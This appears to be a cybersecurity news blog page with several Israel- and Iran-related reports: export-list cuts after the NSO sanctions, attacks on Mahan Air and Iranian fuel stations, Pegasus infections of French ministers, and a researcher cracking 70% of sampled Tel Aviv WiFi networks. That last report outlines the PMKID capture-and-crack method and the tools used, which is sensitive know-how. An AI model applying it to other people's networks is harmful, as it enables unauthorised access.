The government has not issued a comment on the list's update, according to Calcalist journalists, and it is unclear why it was cut down earlier this month. The timing, on the other hand, shows that the Israeli government might have been driven it to make this choice. 

The list was updated a week after a covert meeting between Israeli and French officials to address suspicions that NSO Group malware was deployed against French President Emmanuel Macron. The announcement coincided with the US sanctioning of four monitoring firms, including Israel's Candiru and NSO Group. 

The penalties are reported to have sent NSO into a death spiral, with the business sliding from a prospective sale to French investors to losing its newly-appointed CEO and perhaps filing for bankruptcy as it has become company-non-grata in the realm of cyberweapons. 

Azimuth Security co-founder Mark Dowd discussed Israeli-based surveillance distributors and their knack for selling to offensive regimes in an episode of the Risky Business podcast last month, blaming it on the fact that these companies don't usually have connections in western governments to compete with western competitors. 

With the Israeli Defense Ministry tightening restrictions on cyber exports to autocratic regimes, the restricted cyber export list is likely to make a significant hole in Israel's estimated $10 billion surveillance sector.

As per a study released earlier this month by the Atlantic Council, there are roughly 224 firms providing surveillance and hacking tools, with 27 of them located in Israel.
Read more »
Israel
Cyber Attacks Iran hackers Iranian Airline Israel

Iran's Mahan Airline Targeted in Cyber Attack

 

A cyber-attack against Iran's second-largest airline, Mahan Air has been thwarted, Iranian media reported on Sunday, adding that the airliner's flight schedule was not impacted by the cyber assault.

"Mahan Air's computer system has suffered a new attack. It has already been the target on several occasions due to its important position in the country's aviation industry. Our internet security team is thwarting the cyberattack," airline spokesman Amir-Hossein Zolanvari told state television. 

According to the Daily Sabah, following the attack passengers could not access the airline’s website for hours displaying an error message saying the site couldn’t be reached. Additionally, many customers of Mahan Air across Iran received strange text messages from a group called Hoosyarane-Vatan, claiming to have carried out the attack. 

“We believe the public deserves to know the truth behind this cooperation and the money wasted on IRGC activities abroad while Iranian people suffer at home,” the hacking group said in a statement on the Telegram messaging app. 

Being an Iranian airline, Mahan Air has often found itself in the middle of a political storm. The carrier has been under US sanctions since 2011 for allegedly providing support to the Quds Force and has been associated with alleged shipments of arms from Iran to Shiite groups in Syria, including the Hezbollah terror group. Alleged Israeli airstrikes in Syria have been thought to target Mahan Air weapons shipments in the past. 

“Mahan Air has transported IRGC-QF operatives, weapons, equipment, and funds abroad in support of the IRGC-QF’s regional operations, and has also moved weapons and personnel for Hezbollah,” US Treasury stated in 2019. 

Iran, last month, accused Israel and the United States of a cyberattack on its gas stations that resulted in havoc at fuel pumps nationwide. Iranian President Ebrahim Raisi blamed the hack on anti-Iranian forces seeking to sow disorder and disruption across the nation. 

Days later, Israel's internet infrastructure was targeted by the Iranian Black Shadow hacking group, including against the largest Israeli LGBTQ dating site and an insurance firm. In July, the website of Iran's transport ministry was crippled by what state media said was a "cyber disruption" that caused delays in train services.
Read more »
US
Cyber Attacks Cyber Security News Cybersecurity Cybersecurity Incident Iran Israel US

Iran Accuses USA and Israel for Carrying Out Fuel Cyberattacks

 

An Iranian General alleged that Israel and US might have planned a cyberattack that caused disruption of fuel in service stations in Iran. The attack which happened on Tuesday is similar to two recent incidents where, as per the general, the attackers might be Iran's rivals: USA and Israel. Two incidents were analyzed, the Shahid Rajaei port incident and the railway accident, and found that these two incidents were similar. Earlier this year, as per Iran's transportation ministry, a cyberattack disrupted its website and computer systems, reports Fars news agency. 

"In a country where petrol flows freely at what are some of the lowest prices in the world, motorists need digital cards issued by the authorities. The cards entitle holders to a monthly amount of petrol at a subsidized rate and, once the quota has been used up, to buy more expensive at the market rate," reports The Security Week. In 2020, Washington Post reported an incident where Israel orchestrated an attack on Iranian port Shahid Rajaei (in Hormuz Strait), a strategic path to global oil shipments. 

The recent cyber disruption resulted in traffic jams in major pockets in Tehran, having long lines at petrol pumps disrupting traffic flow. Following the incident, the oil ministry shut down the service stations in order for easy manual distribution of petrol, said the authorities. On Wednesday, President Ebrahim Raisi alleged that the actors were trying to sway the people of Iran against Islamic Republic leadership. As per the reports, an estimated 3200 out of 4300 of the country's service stations have been re-linked with the central distribution system, said the National Oil Products Distribution Company. 

Besides this, there are other stations who also give fuel to motorists, but not at subsidized rates, which makes it twice in the rates, around 5-6 US cents/litre. The Security Week reports, "Since 2010, when Iran's nuclear program was hit by the Stuxnet computer virus, Iran and its arch-foes Israel and the United States have regularly accused each other of cyberattacks. The conservative Fars news agency on Tuesday linked the breakdown to opponents ahead of the second anniversary of deadly protests sparked by a hike in petrol prices."
Read more »
WiFi
Cyber Security Israel Network Security Security Researchers Weak Password WiFi

70% of WiFi Networks in Tel Aviv were Cracked by a Researcher

 

In his hometown of Tel Aviv, a researcher cracked 70% of a 5,000 WiFi network sample, demonstrating that residential networks are extremely vulnerable and easy to hijack. Ido Hoorvitch, a CyberArk security researcher, first strolled about the city center using WiFi sniffing equipment to collect a sample of 5,000 network hashes for the study. 

The researcher then took the use of a vulnerability that allowed the extraction of a PMKID hash, which is typically generated for roaming purposes. Hoorvitch sniffed with WireShark on Ubuntu and utilized a $50 network card that can function as a monitor and a packet injection tool to collect PMKID hashes. 

Although Hoorvitch highlighted that this form of attack does not require such heavy-duty technology, the team deployed a 'monster' cracking rig made up of eight xQUADRO RTX 8000 (48GB) GPUs in CyberArk Labs. The attack is centered on a weakness found by Hashcat's primary developer, Jens 'atom' Steube. This bug can be used to obtain PMKID hashes and crack network passwords.

"Atom’s technique is clientless, making the need to capture a user’s login in real-time and the need for users to connect to the network at all obsolete," explains Hoorvitch in the report. "Furthermore, it only requires the attacker to capture a single frame and eliminate wrong passwords and malformed frames that are disturbing the cracking process." 

The generation and cracking of PMKs with SSIDs and different passphrases can then be used to crack PMKID hashes collected by wireless sniffers with monitor mode enabled. This data is created from the right WiFi password when a PMKID is generated that is equal to the PMKID acquired from an access point. Hoorvitch employed a conversion tool and Hashcat, a password recovery software, after sniffing out PMKID hashes with the Hcxdumptool utility. 

According to Hoorvitch, many Tel Aviv residents use their cellphone numbers as their WiFi password, thus it wasn't long before hashes were cracked, passwords were obtained, and doors to their networks were opened. Each crack on the researcher's laptop took around nine minutes in these circumstances. The team was able to break into over 3,500 WiFi networks in and around Tel Aviv. 

Despite the risk of being hacked, most consumers do not set a strong password for their WiFi networks, according to the report. Passwords should be at least ten characters long, contain a mix of lower and upper case letters, symbols, and numerals, and be unique. Keeping your router firmware up to date will also safeguard your hardware from attacks based on vulnerability exploits, according to the researcher. WAP/WAP1 and other weak encryption protocols should be disabled as well.
Read more »
Smartphones
Cyber Security France French Government Israel Pegasus Smartphones

5 French Minister Phones Affected with Pegasus Spyware

 

At least five French ministers and President Emmanuel Macron's diplomatic advisor mobile phones have been infected by Israel-made Pegasus spyware, whistle-blowers confirmed on Friday 24th of September. 

As per a Mediapart report on Friday, French security agencies have discovered software during the phone inspection, with breaches reported in 2019 and 2020. 

In July Pegasus produced by NSO Group, the Israeli company, was already in the middle of a hurricane following a list of around 50,000 possible surveillance targets worldwide leaking to the media, and was capable of switching the camera or microphone and harbor their data. 

The insinuation was made about two months after the Pegasus Project, the media consortium which included the Guardian, found that a leaked database at the core of the investigatory project included contact information of top France officials, including French President Emmanuel Macron and most of its 20-strong cabinet. 

There is no strong proof of successful hacking of phones of the five cabinet members however media reports suggest that the devices were targeted by the potent spyware known as Pegasus, which is created by the NSO Group. 

Pegasus enables users to track the conversation, text messages, pictures, and location whenever installed effectively by government customers within the Israeli firm and can convert phones into remotely controlled listening devices. 

The consortium of Pegasus Project, organized by the French Forbidden Stories non-profit media, showed that international customers of NSO utilized hacker tools to attack journalists and human rights organizations. 

NSO reportedly stated that its strong malware is designed not to target civilian society members but to probe severe criminals. It has stated it has no link to the leaked database reviewed by the Pegasus Project and also the tens of thousands of numbers included do not target NSO customers. It has also firmly disputed that Pegasus Spyware has always targeted Macron. 

In a statement released on Thursday night, NSO said: “We stand by our previous statements regarding French government officials. They are not and have never been Pegasus targets. We won’t comment on anonymous source allegations.” 

Furthermore, the authenticity of the allegation was verified by two French individuals with knowledge of the inquiry, but they asked not to be named since they had not been allowed to talk to the media. 

"My phone is one of those checked out by the national IT systems security agency, but I haven't yet heard anything about the investigation so I cannot comment at this stage," Wargon told the L'Opinion website Friday. 

Mediapart stated that the handsets of the ministers for education (Jean-Michel Blanquer), Jacqueline Gourault, Julien Denormandie, Emmanuelle Wargon, Sébastien Lecornu and others – displayed indications of the virus Pegasus. The report noted that at the time of the allegations of targeting that happened in 2019 and less often in 2020, not all the Ministers had their current roles, but all were Ministers. The phone of the Macron Diplomatic Consultants at the Elysee Palace was also targeted. 

The Élysée Palace also stated that it would not comment on “long and complex investigations which are still ongoing”. 

The Prosecutor's Office refused to comment or to clarify whether or whether not the ministers' phone hacking had been found, stating that the investigation was subject to judicial confidentiality regulations. Although since the end of July, when the palace officials notified prudence, the Élysée has not reacted to the Pegasus affair and said that “no certainty at this stage”.
Read more »
Subscribe to: Posts (Atom)